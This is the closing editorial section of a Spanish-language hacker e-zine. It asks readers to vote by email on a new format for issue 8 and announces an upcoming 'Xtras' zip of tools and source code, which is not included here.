@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ###################### # 10. EL PUNTO FINAL # ###################### Que os ha parecido este? En el n8 se esperan muchas sorpresas, sobre todo el nuevo formato ke pensamos pre sentar, ke por cierto... ke formato kereis??? Para elegir el formato de nuestra ezine solo teneis que enviar vuestra respuesta

a chuky666@hotmail.com. Poned en el topic "formato" para saber de ke hablais. O K? Los formatos pueden ser de cualquier tipo. Solo teneis que desear el formato mas cmodo para vosotros. La idea surgi por el tema de la incomodidad de pasar el text o hacia abajo para encontrar el articulo deseado. Nuestra idea es poner un men in teractivo. As ke ala...enga, a elegir un formato. A partir del n8 se incluir tb, a parte del formato la vieja xtras. un zip lleno de herramientas y cdigos fuente que ser ofrecido y seleccionado la UCC. En Xtras08.z ip. Por ejemplo, podras encontrar xploits, proyectos, ideas, etc... Todos estos contenidos explicados en un apartado ke vamos a abrir llamado tb Xtras. Si kere is enviar material hacedlo a fonseka@oninet.es (mail de A.S.Fonseka, ke es por a hora kien se encarga de toda la administracin de la UCC y por lo tanto, de los Xt ras).

You might also like